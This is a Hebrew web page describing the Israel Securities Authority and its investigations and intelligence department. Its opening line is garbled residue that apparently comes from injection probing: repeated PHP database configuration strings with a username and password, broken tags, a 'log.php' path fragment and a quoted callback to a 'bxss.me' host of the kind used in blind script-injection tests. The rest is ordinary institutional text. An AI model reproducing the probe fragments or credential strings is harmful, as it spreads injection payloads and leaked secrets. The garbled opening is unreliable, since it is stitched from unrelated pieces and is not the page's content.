$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>
תפקידי הרשות
רשות ניירות ערך הוקמה על פי חוק ניירות ערך התשכ"ח-1968. כפי שנקבע בחוק תפקידה של הרשות הוא שמירת ענייניו של ציבור המשקיעים בניירות ערך. בין יתר תפקידיה מטפלת הרשות בנושאים הבאים: מתן היתר לפרסום תשקיפים, הסדרת הפעילות של ענף קרנות הנאמנות ופיקוח עליו, מעקב אחר דיווחים שוטפים של חברות ותאגידים ציבוריים, פיקוח על ניהולה התקין של הבורסה לניירות ערך, רישוי מנהלי תיקים ויועצי השקעות וביצוע חקירות בגין הפרות ועבירות על חוק ניירות ערך.
מחלקת חקירות ומודיעין
לפי אתר הרשות לניירות ערך, תפקידה של מחלקת חקירות ומודיעין הינו איתור וחשיפה של פעילות עבריינית בשוק ההון. המחלקה מבצעת חקירות בחשד לביצוע עבירות על חוק ניירות ערך התשכ"ח - 1968, חוק השקעות משותפות בנאמנות התשנ"ד1994-, חוק הסדרת העיסוק בייעוץ השקעות, שיווק השקעות וניהול תיקי השקעות התשנ"ה1995. בנוסף לאמור, חוקרי המחלקה מבצעים חקירות בחשד לביצוע עבירות מסוימות לפי חוק העונשין (שוחד, קבלת דבר במרמה, מרמה והפרת אמונים בתאגיד, עבירות מנהלים בתאגיד, שבוש והדחה בחקירה ועוד) ולפי חוק איסור הלבנת הון התש"ס – 2000. עבירות אלו נלוות לעבירות על חוק ניירות ערך, חוק השקעות משותפות וחוק הייעוץ ולכן קמה לחוקרים הסמכות לבצע חקירות בגינן.
מחלקה מפעילה מערכת ייעודית ממוחשבת לצורך מעקב אחר פעילות השחקנים בשוק כדי לאתר חריגות מהוראות החוק. המידע נבחן, מנותח ומוערך על ידי אנשי המחלקה, תוך שימוש במערכות ממוחשבות ובמאגרי מידע בארץ ובחו"ל. בהתאם להערכה ראשונית ננקטות בהמשך פעולות מודיעיניות נוספות לעיבוי, אימות או הזמה של המידע שנבדק תוך הקפדה על חשאיות הבדיקה ומהותה.
אם וכאשר הוחלט על דעת יו"ר הרשות לבצע חקירה אזי החוקרים יכינו תוכנית פעולה שתכלול חיפושים בבתי החשודים ומשרדיהם, תפיסת מסמכים וחפצים הנדרשים לחקירה, יעכבו לחקירה את החשודים המעורבים, יגבו מהם הודעות, יבצעו מעצרים אם צריך כדי למנוע שיבוש הליכי חקירה ויפעלו בתיאום והנחיית הפרקליטות להגיש כתב אישום, אם וכאשר הראיות יבשילו למימוש מטרה זו.
לעיתים נדרשים החוקרים לביצוע חקירות חוצות גבולות. לצורך כך, מקיימים מגעים ותאומים עם רשויות החקירה המקבילות בחו"ל, פועלים לחיקורי דין, חוקרים יוצאים לבצע חקירות בחו"ל בסיוע גורמי אכיפה מקומיים.
במהלך פעילותה, מנתבת המחלקה מידע, על פי הצורך, למחלקות השונות ברשות. מידע זה מסייע למחלקות האחרות לבצע את פעילותן. כמו כן מקיימת המחלקה שיתופי פעולה עם גופי האכיפה האחרים ובהם משטרת ישראל, רשות המיסים והרשות להגבלים עסקיים. לעתים אף מבצעת המחלקה חקירות משותפות עם גופים אלה על מנת לייעל את האכיפה .
מחלקת חקירות ומודיעין כוללת אנשי חקירות שהינם ברובם עורכי דין או רואי חשבון במקצועם. החוקרים עוברים הכשרה מקצועית תוך כדי עבודתם השוטפת. אין בית ספר לחקירות במסגרת הרשות. חוקר חדש נצמד לחונך ותיק ולומד את מלאכת החקירות. לצורך ביצוע תפקידם הוסמכו חוקרי הרשות לדרוש מכל אדם להעביר לידיהם כל ידיעה ומסמך שיש בהם כדי להבטיח את ביצועו של חוק ניירות ערך ולחקור כל אדם בשל חשד לביצוע עבירות לפי החוקים האמורים לעיל. כמו כן הוסמכו החוקרים לעכב, לעצור ולשחרר חשודים בהתאם לחוק סדר הדין הפלילי (סמכויות אכיפה- מעצרים התשנ"ו – 1996).